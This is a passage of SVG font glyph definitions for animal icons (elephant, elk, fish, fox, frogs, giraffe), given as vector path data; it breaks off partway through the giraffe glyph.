<glyph glyph-name="elephant-head" horiz-adv-x="1000" unicode="&#xe84c;" d="M894 215c-13 0-26 0-40-1 17 6 35 10 53 8 3 0 3 1 3 3 0 14-1 28-3 42-1 3-2 3-4 3-13 1-25 0-37-4l-20-5c11 7 23 14 36 16 7 1 13 1 19 2 2 0 4 0 3 3-2 13-5 26-9 38-1 3-3 4-6 5-10 2-21 2-32 0-14-2-28-5-41-10 5 4 11 6 16 8 17 9 35 15 54 13 4 0 4 2 3 4-4 14-10 27-15 39-1 3-2 3-4 4-31 5-59-1-86-15-3-2-5-4-9-5 13 12 28 20 43 26 16 7 32 9 50 7-6 10-11 18-15 27-3 7-8 10-15 11-5 0-10 2-15 2-30 0-58-9-84-23-1-1-2-2-3-2-1 0-2-2-4 0 32 24 65 43 107 36-4 7-8 14-12 20-2 2-4 4-6 5-6 4-13 6-21 8-29 7-55-4-80-15-9-4-18-10-26-16-1-1-2-3-4-1 4 4 8 8 12 12 5 5 12 8 17 12 18 14 39 22 63 23 9 0 19-1 28-5-3 6-7 10-7 15-1 16 0 32 5 47 4 11 7 23 7 35 0 34-16 63-34 90-5 8-12 15-18 22-13 16-29 29-45 39-16 10-32 20-51 26-13 4-27 9-41 13-20 6-41 7-61 9-12 1-23 2-35 1-6 0-11 2-16-1-2 2-4 1-6 1-25 0-49-3-74-5-10 0-20-3-30-4 20-10 41-16 59-28 0 0-1 0-2 0-19 6-39 10-59 13-26 4-52 3-78-2-19-4-37-12-56-18-18-6-35-15-51-25-18-10-34-23-48-37-10-10-20-21-28-32-14-19-25-39-33-62-9-27-17-54-18-82-1-24-2-47 2-70 4-20 12-39 20-58 4-8 9-16 17-23 2 35 7 69 24 100 1-2 0-3 0-4-10-35-15-69-12-105 0-3 1-5 3-7 14-13 30-24 45-36 6-4 12-8 18-12 2 57 4 112 23 165 0-1 0-1 0-2-4-18-7-35-8-53-4-37-4-73 0-110 0-6 0-12 8-14 1 0 3-1 4-2 19-12 40-21 60-30 5-3 5-1 5 4-2 24-3 48-4 72 0 23 0 45 1 67 2 26 3 52 9 77 1 3 1 6 3 8-4-35-5-84-3-122 2-38 7-75 14-112 0-3 2-4 4-5 15-5 29-11 44-15 29-8 58-17 86-27 6-1 4 3 4 5 0 20-6 39-14 58-7 19-17 38-29 55-10 13-20 26-26 41-10 25-18 52-25 79 0 2-1 4 0 7 5-22 13-42 22-61 9-20 21-39 35-57 11-12 22-24 36-34 17-12 35-23 55-29 22-7 45-12 68-13 24-1 48 0 71 4 13 2 27 5 40 9-25 23-43 51-53 83 1-1 2-2 3-4 6-11 13-22 21-32 9-11 19-22 31-31 7-4 13-11 21-14 12-4 21-12 27-23 10-16 17-34 19-53 6-47 3-93-16-138-9-23-24-41-45-52-5-3-15-5-20-5 2 1 3 1 4 2 9 3 17 10 23 18 3 2 4 5 0 8-6 5-9 12-11 20-10 26-3 50 6 74 7 19 18 35 27 52 4 7 8 14 10 21 0 4 3 9 0 12-4 3-9 1-13 0-11-5-23-6-35-5-11 0-23 2-34 4-14 2-18-2-16-16 2-16 0-31-5-46-5-16-13-31-17-47-6-25-9-50-8-76 1-14 3-27 9-39 10-18 25-31 43-41 36-18 73-18 110-5 24 10 45 25 64 44 5 5 9 11 14 16 7 9 14 19 20 29 3 6 2 8-4 9 0 0 0 1 0 1 0 0 1 1 2 0 5-2 7 1 9 5 5 7 8 15 11 23 4 13 4 13-9 17l-2 1c4 0 8 0 12 0 3-1 5 1 5 4 3 11 5 21 8 32 1 4 0 5-4 6-10 1-19 4-29 6 10 1 21 0 31-2 3 0 4 0 5 4 2 12 4 24 5 36 1 5-1 8-6 9-12 2-24 4-37 4 1 1 2 1 3 1 12 2 24 3 36 1 4 0 5 1 5 5 0 8 1 16 1 25 0 16 0 16-17 17z m-394 328c-4-2-8-3-11-3-14 2-23 10-30 20-1 2 0 3 1 3 15 5 33 6 43-11 2-5 2-7-3-9z m23 237c2 1 4 3 7 6l0 0c-3-3-5-5-7-6z" />
<glyph glyph-name="elephant" horiz-adv-x="1000" unicode="&#xe84d;" d="M918 427c-3 11-13 8-22 6-11-3-7-10-5-17 7-22 13-45 12-68 0-31-18-49-49-51-50-2-104 31-126 76-22 47-21 98-24 148-5 86-46 135-126 146-76 9-152 6-227-13-104-25-180-83-208-190-8-29-24-46-49-58-7-4-16-7-24-9-8-3-8-9-7-16 2-9 7-11 15-8 16 5 31 11 48 17-9-117 5-230 17-343 1-12 6-15 17-17 26-4 51 0 77 1 28 2 29 1 29 30 0 44 1 88 4 131 2 38 21 62 56 73 22 7 45 8 67 5 63-9 102-35 115-100 7-36 13-72 18-107 4-32 3-32 36-34 20-1 41 0 61 2 11 1 16 5 17 17 11 67 17 135 23 202 3 27 2 27 28 19 55-16 110-31 168-27 37 2 61 19 72 51 16 47 1 91-13 134z m-424 111c-5-33-3-66 6-99-17 29-18 61-13 93 2 18 7 36 18 51 11 16 24 26 44 21-31-3-49-26-55-66z m157-38c-12 1-10 11-11 20 0 6 1 12 9 13 8-4 12-10 12-18 0-7-1-15-10-15z" />
<glyph glyph-name="elk" horiz-adv-x="1000" unicode="&#xe84e;" d="M920 605c-8 15-18 29-28 41-46 52-102 90-159 129 27-52 75-86 113-137-76 14-149 5-220 55 29-49 53-66 105-79 32-7 65-10 97-20 23-6 46-22 42-49-3-26-32-21-50-22-90-2-176-16-247-87-6 56 15 101 23 160-73-82-83-171-79-263 1-24 11-48 41-50 29-1 38 21 43 46 13 73 60 113 129 129 43 10 87 13 131 22 75 14 95 58 59 125z m-519-290c3-21 20-35 43-31 21 3 35 18 36 40 1 32 3 64-1 95-7 62-22 122-74 172 5-55 25-101 22-159-53 59-117 79-185 87-29 4-58 3-87 7-33 6-38 23-16 48 21 23 50 28 79 31 41 4 79 15 113 37 16 10 32 21 33 47-64-48-137-35-211-51 38 55 92 88 115 145-42-33-84-65-125-100-36-31-68-66-78-114-9-42 4-67 44-82 24-9 50-12 76-15 102-11 197-31 216-157z m380-94c9-19-8-25-21-30-33-13-67-12-101-3-27 7-53 18-58-26-1-9-12-18-28-11 7 12 14 24 22 36-77-56-25-146-62-215-21 22-45 32-66-2-42 67 12 157-56 219-5-19 18-24 12-39-19-2-29 12-31 26-3 27-16 20-34 16-30-7-62-16-93-8-23 5-49 8-52 40-28-22-1-33 11-42 35-28 76-19 116-15 11 1 21 11 29-8 24-64 63-123 70-193 4-34 29-48 58-49 30-1 57 13 62 44 9 65 37 121 63 178 12 27 20 34 48 28 39-8 81-11 113 22 16 15 15 19-2 32z m-1 1l1-1c0 1 0 1 0 2l-1-1z m-564 4l-3-1 0 0c0 0 0-1 0-1l1 0c1 1 1 1 2 2z m119-9c26-12 51 3 63 36-28-9-53-11-78-3-40 13-74 3-104-24 40 9 79 10 119-9z m355 36c-30-7-59-11-93 2 19-38 46-50 77-34 36 18 70 16 105 3-22 31-55 37-89 29z m90-31l1 1c-1 1-2 1-2 1 0-1 1-1 1-2z" />
<glyph glyph-name="fish-1" horiz-adv-x="1000" unicode="&#xe84f;" d="M111 314c-34 11-51 34-48 65 4 43 52 67 89 45 4-2 8-5 12-8 56-52 121-62 193-41 51 16 99 39 149 58 44 16 89 29 136 31 77 3 143-24 205-68 31-22 59-48 86-75 4-4 8-7 2-13-46-47-95-89-155-117-76-35-154-35-233-10-52 16-102 40-154 59-30 11-61 20-93 22-51 3-95-14-133-47-15-14-31-23-53-19-27 4-47 23-51 50-4 27 11 52 36 63 3 2 7 3 12 5z m715-1c0 54-42 97-96 97-54 0-97-43-97-97 0-52 43-95 95-96 54 0 98 43 98 96z m-168 169c-44-2-86-10-127-24-9-2-17-5-26-9-8-3-9 1-9 8-2 30 14 59 41 71 28 14 61 9 84-12 12-11 23-23 37-34z m72-120c26 0 48-22 48-48 0-27-22-49-49-48-26 0-47 21-48 48 0 27 22 48 49 48z" />
<glyph glyph-name="fish-2" horiz-adv-x="1000" unicode="&#xe850;" d="M684 187c-44 1-94 14-144 31-63 21-123 50-187 71-31 10-63 19-96 17-21-1-39-9-55-22-17-15-34-29-52-43-25-20-57-18-76 6-18 23-14 55 10 75 6 5 12 10 17 15 14 11 14 16 0 27-6 5-12 10-18 16-24 21-27 53-8 76 20 22 51 24 76 4 14-12 29-23 42-36 29-28 64-33 101-27 53 9 102 31 152 50 57 23 114 46 174 59 61 12 121 13 178-17 37-18 66-47 90-80 3-5 4-8-3-11-20-9-35-25-50-42-5-5-3-8 1-12 14-16 29-32 50-42 7-3 5-6 2-10-48-67-111-105-204-105z m-533 163c-6-4-12-7-17-11-13-11-17-28-11-43 5-13 21-22 36-21 5 0 8 0 8 6 0 4-3 6-7 6-1 0-3 0-5 0-14 2-22 9-24 22-1 11 6 22 18 27 13 5 27 5 40 5l474 0c16 0 32 2 45-11 2-2 7-3 10-4 25-7 52 1 69 21 16 21 18 49 6 71-12 23-39 37-63 34-40-5-66-44-54-83 2-9 0-11-8-11-28 1-56 1-84 1h-392c-15 0-31 0-45 7-11 5-17 14-15 26 1 11 9 18 21 20 3 0 6 1 10 1 4 0 4 3 4 6 0 3-1 4-4 5-18 5-40-10-42-29-4-23 10-36 30-45z m510-181c-40-27-81-47-131-43-57 5-75 51-70 94 1 11 8 5 12 3 39-15 79-30 119-40 23-6 46-10 70-14z m2 362c-69-7-131-29-192-54-10-4-11 1-11 9-5 62 41 95 97 88 28-3 54-13 79-27 8-5 18-6 27-16z m275-182c0-6-2-13-5-20-6-15-19-21-35-17-20 6-34 20-48 34-2 3-3 6 0 9 13 13 26 27 44 33 25 9 43-7 44-39z m-245 39c0 23 20 43 43 43 24 0 44-19 44-43 0-24-20-45-44-44-24 0-43 20-43 44z" />
<glyph glyph-name="fish-3" horiz-adv-x="1000" unicode="&#xe851;" d="M757 348c-1 76 51 120 96 132 25 8 49 8 74 1 8-3 11-7 10-15-1-52-25-90-70-115-3-2-7-4-11-6 0 0 0-1-1-2 4-2 8-4 12-6 44-26 69-63 70-115 1-9-2-13-11-16-79-24-166 37-169 120 0 4 0 8 0 12-6-1-6-6-8-9-51-81-121-137-211-169-10-4-10-7-7-15 7-15 9-30 10-46 0-9-3-13-12-16-51-15-108 3-142 46-5 6-9 9-17 10-128 15-226 76-299 182-11 16-12 27 0 44 58 87 137 145 239 172 5 1 8 4 11 8 39 59 96 79 163 77 12-1 24-3 36-6 8-2 11-5 11-13 0-22-6-41-17-59-3-4-6-7 2-9 104-31 182-94 239-186 0 0 0 0 2-1z m-559-84c44 0 79 36 79 79 0 44-36 80-80 80-43 0-79-36-79-80 1-44 36-79 80-79z m254 120c1 1 1 2 2 2 29 24 31 50 3 77-6 6 0 6 2 9 14 12 20 27 16 45-3 18-22 35-39 35-4 0-8 1-8-4-1-4 3-5 6-6 3 0 5 0 8-1 23-7 32-33 20-53-7-10-16-16-28-17-3 0-7 0-7-4 0-4 3-5 6-6l5 0c18-5 30-18 29-35 0-18-11-32-30-35-4-1-10-1-11-7 0-6 7-4 11-5 19-5 30-19 29-38-1-17-13-30-31-32-4-1-9-1-9-6 0-5 5-4 9-4 18-3 31-16 33-33 1-18-12-33-30-38-3-1-11 1-10-6 0-6 7-4 11-5 25-6 35-30 24-52-6-11-16-16-27-18-4-1-9-1-8-6 1-5 6-4 9-3 9 1 17 4 23 9 24 21 22 52-7 76 14 10 23 22 24 40 0 18-10 30-23 41 29 28 29 52-2 80z m401 67l1-3c-4-1-7-3-10-5-42-22-64-56-62-102 1-47 25-80 67-100 12-5 25-7 38-8 6-1 12-1 12 7 1 7-5 8-10 8-4 0-8 1-12 1-43 7-77 43-80 87-3 46 24 85 67 99 9 2 18 4 27 4 5 1 8 3 8 9 0 4-2 6-6 6-19 0-38 0-57 0v-2c6 0 12-1 17-1z m-331-189c31 28 31 52 0 82 31 26 31 54 0 81 3 2 6 5 8 7 13 13 18 29 13 46-5 17-16 27-34 31-4 1-11 4-13-2-2-8 7-6 11-7 18-5 29-18 29-35-1-18-12-31-30-35-3-1-10 1-10-6 0-5 6-4 10-5 19-5 30-18 30-36-1-17-13-31-31-35-4 0-9 1-9-4-1-6 5-5 9-6 19-5 31-18 31-35 0-18-12-32-31-36-4-1-9 1-9-5 0-5 5-4 8-5 12-2 21-8 27-18 12-23-1-48-27-53-3 0-8 1-8-5 0-6 6-4 10-4 3 0 6 1 10 2 31 12 43 57 6 83z m-140 163c4 3 8 6 10 9 13 13 16 29 10 46-5 17-17 26-34 29-4 1-10 3-11-2-2-7 5-6 9-7 19-4 30-17 30-34 1-18-12-32-31-37-3 0-9 1-9-4 0-6 6-5 9-6 20-5 32-18 31-35 0-18-12-31-31-36-4-1-8 0-8-4-1-6 4-5 8-6 20-5 32-18 31-36 0-17-12-31-31-35-3-1-8 1-8-5 0-5 5-4 8-5 20-4 32-18 32-36-1-18-12-31-32-35-4-1-9 0-8-6 1-5 6-4 9-3 20 2 37 20 39 40 2 19-7 34-22 45 31 28 31 50 0 82 30 26 30 54-1 81z m210-41c4 4 7 6 10 9 13 14 16 31 9 48-5 16-18 25-34 28-4 1-10 3-11-3-1-7 5-5 9-6 20-5 31-19 31-36-1-17-13-31-32-35-3-1-8 1-8-5 0-5 5-5 9-5 19-5 31-18 31-36-1-18-13-31-32-35-3-1-8 0-8-5 0-5 4-5 8-5 20-5 32-18 32-36-1-18-12-31-33-35-3-1-8-1-7-6 1-5 5-4 9-4 20 2 37 20 39 40 2 20-7 35-23 46 32 26 32 55 1 81z m-260-42c0 11-1 21-3 32-9 41-31 73-66 95-3 2-7 6-10 3-4-5 4-5 5-8 1-1 2-2 3-2 78-60 78-178-1-237l-7-5c-1-1-2-3-1-4 1-1 3-2 4-1 3 1 6 2 9 4 43 30 65 71 67 123z m329 1c4 4 8 7 11 10 12 14 16 29 10 46-6 17-18 27-35 29-4 1-10 3-11-3-1-6 5-5 9-6 20-5 30-17 30-36-1-18-12-30-32-35-3-1-8 0-8-4 0-5 5-5 9-6 20-5 31-17 31-35 0-19-12-32-32-36-4-1-9 0-7-6 1-4 5-3 8-3 27 2 46 30 39 57-3 12-12 21-22 28z m-463-41c-24 0-43 19-43 42 1 22 20 41 42 42 24 0 43-20 43-43 0-23-19-41-42-41z" />
<glyph glyph-name="fish-4" horiz-adv-x="1000" unicode="&#xe852;" d="M186 312c-3 29 0 57 13 83 1 4 1 5-3 7-17 9-34 20-52 27-18 7-43 5-57-10-10-10-14-21-18-34-2-8-4-16-5-24-2-14-2-44 0-58 1-8 3-16 5-24 11-39 34-54 73-46 21 5 38 19 56 30 3 2 2 4 0 6-6 13-10 28-12 43z m239-106c-14 35-23 71-25 108-2 24 0 48 4 72 7 36 17 71 38 103 2 4 2 7-3 9-16 6-31 13-47 19-28 9-56 19-87 16-12-2-24-6-31-16-11-17-11-36-8-54 2-16 12-29 23-41-14-7-27-16-41-20-6-2-9-5-11-11-7-23-10-47-8-72 1-17 4-32 8-48 2-5 5-8 10-9 11-3 21-10 31-15 4-2 3-4 2-6-10-20-16-40-15-63 1-19 10-38 32-44 25-7 51-4 76 1 24 5 46 16 69 23 5 2 5 4 3 8-8 13-14 26-20 40z m281-10c-16 29-28 59-34 92-3 14-4 29-4 43-1 23 2 45 8 68 8 29 21 55 37 80 6 9 13 16 20 23 3 4 4 8 3 13-12 39-36 68-70 89-17 11-34 19-53 24-60 18-88 0-88 0-13-5-22-13-27-28-7-21-6-44-6-66 0-12-1-24-7-37-18-43-28-89-32-136-2-26-2-52 1-77 5-34 11-67 24-98 12-27 20-55 18-85-1-10 3-22 12-30 2-2 5-3 7-4 1 0 47-11 95 11 14 7 26 15 37 26 7 6 14 13 21 20 7 10 17 14 29 16 15 1 30 6 45 11-15 13-26 28-36 45z m222 170c-11 24-29 43-49 59-31 27-66 48-103 66-5 3-8 2-11-2-14-23-26-47-34-72-11-36-15-72-11-110 2-25 8-50 16-75 9-24 22-47 37-68 1-2 3-3 5-1 9 4 19 7 27 11 35 18 68 39 94 70 12 14 22 29 30 46 3 8 5 16 7 25 2 7 2 23 0 30-1 8-5 14-8 21z m-94-67c-16 1-31 15-31 33 0 18 15 32 32 32 18 0 33-15 33-32 0-18-15-33-34-33z" />
<glyph glyph-name="fish-5" horiz-adv-x="1000" unicode="&#xe853;" d="M63 505c10-45 26-87 50-127 37-61 85-110 146-147 33-21 70-36 108-47 4-1 8-4 11-7 40-43 87-76 142-95 1-1 2-1 5-2 2 17 4 34 6 50 1 12 3 24 5 36 0 2 3 6 5 6 56 8 107 26 156 54 2 1 3 2 7 3 27-63 65-117 119-163 0 5 0 8 0 11 2 57 3 115 5 172 0 6 2 12 6 17 33 47 66 95 100 142 1 2 2 4 4 7-70-5-133-26-193-61-37 85-93 152-172 202 18 0 64-23 108-53 6 34 11 67 16 100-91 31-181 46-275 11 61-162-26-297-95-341 23 22 41 46 55 73 32 63 39 128 21 195-7 27-18 51-34 74-1 2-5 4-7 4-47 2-93-4-137-17-38-11-73-26-105-48-19-12-37-26-55-40-2-2-3-6-2-9z m162-18c21 10 45 2 55-18 10-20 2-45-18-55-20-10-45-2-55 19-10 20-2 44 18 54z" />
<glyph glyph-name="fish" horiz-adv-x="1000" unicode="&#xe854;" d="M937 346h0c0 32 0 63 0 95 0 17-1 18-17 11-30-13-61-25-91-39-17-8-27-8-41 7-51 53-107 100-174 134-2 1-7 1-6 6 1 5 4 8 8 8 17-1 33 7 51 6 29-1 58 0 87 0 4 0 11-3 14 4 2 6-4 11-8 14-17 15-37 26-56 38-41 25-85 40-133 39-55-2-105-21-149-55-19-15-37-31-63-36-23-5-25-12-18-30 8-22 12-45 16-68 6-36 11-73 13-109 2-44 1-88-7-131-6-35-16-69-33-101-4-6-3-10 4-13 26-9 53-19 81-21 9-1 18-2 25-8 28-24 60-40 95-52 20-8 42-12 63-13 11-1 24-1 30 10 7 11-1 20-7 28-10 15-19 30-29 45-5 8-7 13 5 19 22 10 43 21 63 34 55 36 103 79 146 127 8 8 14 10 25 4 31-19 63-37 95-56 6-3 12-5 12 6-1 32-1 65-1 97z m-625 205c-1 8-6 13-16 7-14-9-30-14-45-24-71-45-133-102-185-169-4-5-6-10 0-15 35-29 71-54 119-50 5 1 12 2 12-6 0-6-6-8-12-9-21-1-41 2-62 10-13 5-24 14-38 17l-2-4c12-13 25-27 37-40 49-49 102-92 164-125 12-6 17-3 21 7 18 39 30 80 34 123 8 95-5 187-27 278z m-97-201c-26 0-43 20-44 47-1 27 25 44 45 44 26-1 46-20 46-47 0-23-23-44-47-44z m1 71c-13 0-24-10-25-23 0-14 12-27 26-26 11 0 24 13 25 25 0 13-12 24-26 24z" />
<glyph glyph-name="fox-alt" horiz-adv-x="1000" unicode="&#xe855;" d="M936 288c-7 38-25 70-45 102-13 21-25 44-37 66-4 7-3 11 4 16 20 15 35 34 44 57 22 59 24 119 13 179-4 17-11 34-19 49-7 14-20 24-37 22-12-1-25-5-36-11-61-29-112-71-160-118-6-6-10-9-20-8-22 4-45 6-68 6-72-1-145-3-218-5-6 0-14 3-18 6-20 17-38 35-58 52-36 29-72 56-115 73-36 14-54 2-69-27-5-9-7-19-10-28-11-44-11-88-5-131 6-43 20-84 55-112 11-8 12-15 6-25-14-25-28-49-43-73-20-33-36-68-38-101 0-41 10-58 41-72 18-9 37-16 57-22 67-23 134-49 189-97 5-5 10-13 11-20 7-38 22-73 48-103 46-54 119-57 169-8 31 29 47 66 56 106 1 7 4 15 8 18 31 22 62 46 95 62 50 23 102 40 153 60 41 16 54 43 47 87z m-694 259c-29 7-52 23-69 47-27 37-33 79-32 124 42-41 83-84 115-133 3-4 5-8 6-12 2-8 2-16 3-25-8 0-16-2-23-1z m155-281c-12-6-26-11-40-13-21-2-44 6-66 7-2 0-7 2-7 4-3 16-6 32-6 48-1 8 6 13 16 12 36-5 71-14 103-33 15-9 15-18 0-25z m155-263c-2-26-15-47-39-59-14-7-28-4-40 5-19 13-29 33-32 56-1 14 4 25 20 28 12 3 24 3 37 5l0-1c9 0 19 0 28-1 21-3 28-12 26-33z m163 291c-3-32-6-26-35-35-14-4-31-7-45-6-14 2-28 7-41 14-14 7-13 17 2 25 17 8 34 15 52 21 16 5 32 8 48 11 13 2 18-5 19-16 0-5 0-10 0-14z m60 264c-12-6-25-10-38-12-15-2-20 5-14 18 9 17 18 34 30 49 30 36 61 71 92 107 8-58-15-135-70-162z" />
<glyph glyph-name="fox" horiz-adv-x="1000" unicode="&#xe856;" d="M937-27c-5 20-17 36-38 39-15 2-23 9-31 20-4 5-8 11-13 16-6 6-7 12-7 20 0 62 0 124 0 186 0 7 1 13 5 19 53 95 43 188-16 276-42 61-86 120-130 180-2 3-3 7-9 8v-103l-3-1-75 105c-2-28-2-55-2-82-1-19 4-39-2-55-7-15-25-26-37-40-7-7-14-10-25-10-26 1-52 1-79 1 0-3 0-5 1-6 16-57 71-101 131-103 23 0 45 0 70 0-4-5-6-8-9-11-54-54-109-108-163-162-34-35-63-73-82-119-23-58-26-119-26-180 0-9 6-8 11-8 37 0 73 0 110 0 82 0 163 1 244 0 12 0 13 5 11 14-5 20-24 36-45 36-14 1-27 0-42 0 25 39 33 68 24 120 5-6 8-10 11-13 39-50 79-99 118-148 4-5 7-10 15-10 25 1 50 1 74 0 10 0 11 4 9 11z m-274 562c-10 0-19 9-19 19-1 9 8 19 18 19 10 1 19-8 20-18 0-10-9-20-19-20z m-439 3c-53 20-108 11-161 12 58-18 86-65 84-123-2-81 0-161 0-242 0-117 88-212 205-221 16-1 16-1 16 16v351c0 93-57 175-144 207z" />
<glyph glyph-name="frog-tracks" horiz-adv-x="1000" unicode="&#xe857;" d="M929 530c-11 11-22 11-34 2-8-7-14-15-18-24-14-30-40-44-67-57-14-7-23-2-27 11-15 45-16 91 4 134 9 20 15 39 9 61-4 12-6 26-22 28-18 1-31-8-38-24-8-16-3-32 2-48 7-21 14-42 9-68 0-9 1-21 0-33-2-13-4-26-7-38-8-27-29-34-51-15-21 18-40 38-43 69 0 8-4 13-11 17-13 6-35 0-42-11-9-15-4-34 10-45 14-11 28-23 41-34 28-23 30-52 20-84-4-15-14-24-31-25-24-1-48 2-68 20-10 9-22 15-36 18-13 3-24 2-32-10-8-14-12-30-4-45 8-13 20-11 33-8 14 3 29 7 42-1 45-28 95-50 133-88 14-14 30-23 48-28 15-4 32-7 42 7 23 32 45 64 32 106-4 11-5 23-8 34-5 17-4 35 8 48 29 31 51 69 93 84 5 2 10 6 14 10 11 13 9 25-1 37z m-467-335c-9-3-17-7-24-13-22-20-47-23-74-21-11 0-18 5-23 13-16 24-14 65 6 86 15 15 29 31 47 41 17 9 20 24 16 40-5 19-21 19-36 19-12-1-20-5-21-17-2-34-23-56-48-74-16-13-37-6-43 13-5 13-7 27-8 40-3 38-4 75 9 112 12 33 0 56-27 64-12 3-20 0-25-10-11-21-17-45-4-66 16-26 20-54 20-84 0-22 2-44-11-64-5-8-10-15-20-11-28 10-54 24-69 51-5 10-11 19-18 26-16 15-27 16-38 2-13-15-11-26 5-40 12-11 30-10 41-23l55-60c15-16 19-35 12-57-12-42-16-82 13-120 18-24 27-32 56-23 14 4 28 10 37 20 36 36 80 57 122 84 21 13 41 17 65 12 24-6 35 5 33 29-2 30-20 42-48 31z" />
<glyph glyph-name="frog" horiz-adv-x="1000" unicode="&#xe858;" d="M884 200c-6 1-12 1-18-1-13-5-26-9-39-13-18-5-36-11-54-15-4-1-8-1-11 2-4 4-1 8 1 12 7 13 17 23 31 30 8 3 16 7 23 11 10 4 12 11 9 21-4 10-11 14-21 13-6 0-12-4-17-8-19-15-35-32-49-51-24-32-57-33-91-31-7 0-11 5-10 13 3 20 5 39 9 58 8 48 20 93 53 131 13 15 25 24 46 22 15-2 27 7 34 21 6 11 4 21 1 32-4 17-2 32 6 47 4 8 8 16 10 25 3 15-2 27-16 33-6 3-13 5-20 4-28 0-55 5-81 15-22 9-42 3-53-18-3-8-10-14-17-18-13-8-27-12-39-20-13-8-26-8-40-5-43 8-85 16-127 24-26 6-27 6-18 32 6 17 12 36 30 45 23 13 45 26 72 31 8 1 17 2 25 8 8 7 13 16 10 27-2 11-10 17-21 20-10 2-17-3-25-9-10-7-16-17-23-27-5-7-13-9-19-6-7 4-2 12 0 18 10 18 24 32 41 44 9 6 17 13 21 24 5 12 1 21-11 26-13 4-24-1-31-17-10-22-26-42-40-62-3-3-5-8-11-6-5 1-7 5-7 10-4 16-2 31 5 46 4 8 8 16 9 25 3 15-2 22-15 24-15 3-21-2-23-18-1-8 0-17 0-26 1-9 1-17 1-26 0-41-10-80-20-119-5-25-10-50-10-75 0-14 6-22 18-27 15-5 30-8 46-12 12-3 25-6 36-11 6-3 8-7 7-13 0-5-5-4-8-4-8-2-15-4-23-5-35-7-66-22-89-51-10-13-18-27-26-41-1 23-2 46-5 69-3 14-5 27-13 38-3 5-7 9-13 8-12-3-22-9-29-18-19-23-38-47-57-71-3-4-6-8-12-8-1 21-3 42 1 63 5 29 20 42 50 46 21 2 42 7 62 17 10 4 18 21 15 33-3 11-12 16-26 14-16-2-30-10-43-19-8-6-16-12-24-16-7-4-12-1-11 7 2 9 5 16 11 23 10 13 20 27 27 42 7 17 1 33-15 42-15 8-26 6-36-7-8-10-12-21-12-33 0-16-3-31-7-46-1-5-3-11-7-16-9 18-13 59-7 77 2 5 1 10-2 14-6 7-13 11-21 13-18 6-30-2-34-20-3-18 4-33 13-47 18-30 24-64 27-98 4-29-5-56-4-84 1-44 0-89 5-133 1-8 0-18 10-20 8-2 13 6 17 12 21 26 42 52 56 82 4 11 11 19 22 27-1-5-1-8-1-12-3-39-11-77-18-115-5-21 2-38 19-51 12-10 26-9 40-11 30-5 60-6 85-25 8-6 17-8 25-12-7-4-10-4-17-4-36-2-70-10-103-24-14-6-15-16-5-27 4-4 8-8 13-10 28-13 56-23 86-29 19-4 39-7 57-15 37-16 69-40 101-63 13-9 27-14 37-26 7-9 16-12 26-13 10-1 19 5 20 11 1 8-7 19-15 21-23 6-42 19-60 33-10 7-9 13 2 16 25 7 50 17 76 4 3-2 8-2 13-2 5 0 11 0 14 6 3 6 2 12-2 18-7 11-17 13-29 12-30-2-59-6-89-7-8 0-10 3-6 9 9 18 22 31 41 36 6 2 13 4 12 11-1 11-6 21-16 27-8 5-15-2-20-7-18-15-34-31-46-50-5-7-11-14-20-13-27 1-50 15-74 28 15 3 27 5 40 8 13 3 26 7 39 10 17 5 33 13 49 22 14 9 13 21-1 29-5 3-10 5-16 7-15 5-31 8-46 14-15 6-31 12-47 25 7 1 11 2 15 2 17 2 34 4 50 5 27 2 48 14 66 33 11 13 20 26 31 39 3 4 7 10 13 6 6-3 8-10 6-16-8-32-7-65-4-97 1-14 5-17 19-21 15-3 30-2 45 0 31 4 62 5 94-6 30-10 57-24 80-47 5-5 10-9 16-12 15-6 28 1 32 16 1 9 0 16-10 19-7 2-15 4-22 6-17 6-34 9-50 18-12 7-14 19-1 23 27 11 54 24 84 9 13-6 27 2 31 17 4 11-4 21-18 25z" />
<glyph glyph-name="froggy" horiz-adv-x="1000" unicode="&#xe859;" d="M103 309c0 50 9 99 28 146 2 4 1 6-2 10-43 45-61 99-53 160 5 39 22 72 48 101 32 34 71 55 117 60 69 7 126-17 171-71 3-4 7-8 10-13 1-3 3-4 6-3 32 6 65 8 98 6 15-1 30-3 45-6 3-1 5 0 7 3 18 27 42 49 71 64 22 11 44 18 69 21 29 2 58-1 86-12 46-18 81-50 103-95 34-71 21-153-32-211-7-7-7-12-4-20 9-23 15-47 19-72 4-24 7-48 6-73-1-66-17-128-49-186-32-58-75-105-131-142-46-30-97-50-153-59-17-3-35-4-52-4-29-1-57 1-85 6-38 7-75 20-110 38-43 22-80 51-112 87-27 30-49 64-66 100-18 40-29 82-33 126-1 13-2 26-2 39z m397-97l-309 0c-3 0-6 0-9 0-4 0-5-2-4-5 7-20 16-40 26-59 19-32 42-60 70-85 21-19 44-35 69-48 29-15 59-26 92-32 24-5 48-7 73-7 29 1 56 6 84 13 22 6 44 15 65 26 27 14 52 32 75 53 12 12 24 25 35 39 14 18 26 36 36 57 7 14 13 28 18 42 2 5 1 6-4 6-16 0-33 0-49 0h-268z m-237 511c-68 1-125-55-125-124 0-69 55-126 124-126 69-1 126 55 127 123 1 70-57 128-126 127z m473 0c-69 0-125-56-125-126 0-68 57-125 126-124 72 1 125 60 124 127 0 68-56 124-125 123z m-468-192c-1 21 15 38 36 40 25 2 42-17 43-37 1-21-16-40-36-42-23-2-44 17-43 39z m495-39c-22 0-40 18-39 41 1 19 16 39 41 38 22 0 39-18 39-41-1-22-19-39-41-38z" />
<glyph glyph-name="giraffe-head-1" horiz-adv-x="1000" unicode="&#xe85a;" d="M599-23c-18 7-17 21-29 27-3-27 5-54-14-77-10 7-13 22-24 31-6-6 1-13-4-19-11-4-15 10-24 12-7-10-7-20-10-30-1-4-3-7-6-8-4-2-8 2-8 5-3 26-32 41-28 69-12 1-5-13-15-14-2 7-3 14-5 21-2 5 2 13-6 15-6 1-5-9-11-11-6 6-2 13-1 18 6 15 2 27-5 39-15 26-22 54-21 85 1 27-6 52-16 77-24 59-44 119-44 184 0 39-19 66-57 78-58 19-67 68-70 116-1 15 11 12 18 9 17-6 32-16 47-26 24-17 48-35 71-53 11-8 20-9 30 1 2 2 7 2 5 5-8 19 8 27 16 39 9 12 6 29 2 43-15 64-52 115-101 156-6 5-11 9-18 14 31 3 81-19 111-48 29-29 47-65 61-102 8-19 13-39 25-55 22-34 51-34 73-1 7 11 11 23 16 35 13 30 24 61 42 89 33 50 80 76 144 86-47-36-82-74-106-121-11-22-20-45-20-70 0-13-4-29 14-36 6-3 4-9 2-14-7-12-2-18 9-26 12-9 18-2 26 4 33 26 65 54 102 76 7 4 16 11 23 7 10-6 5-18 4-26-5-47-21-87-71-105-37-14-47-48-47-83 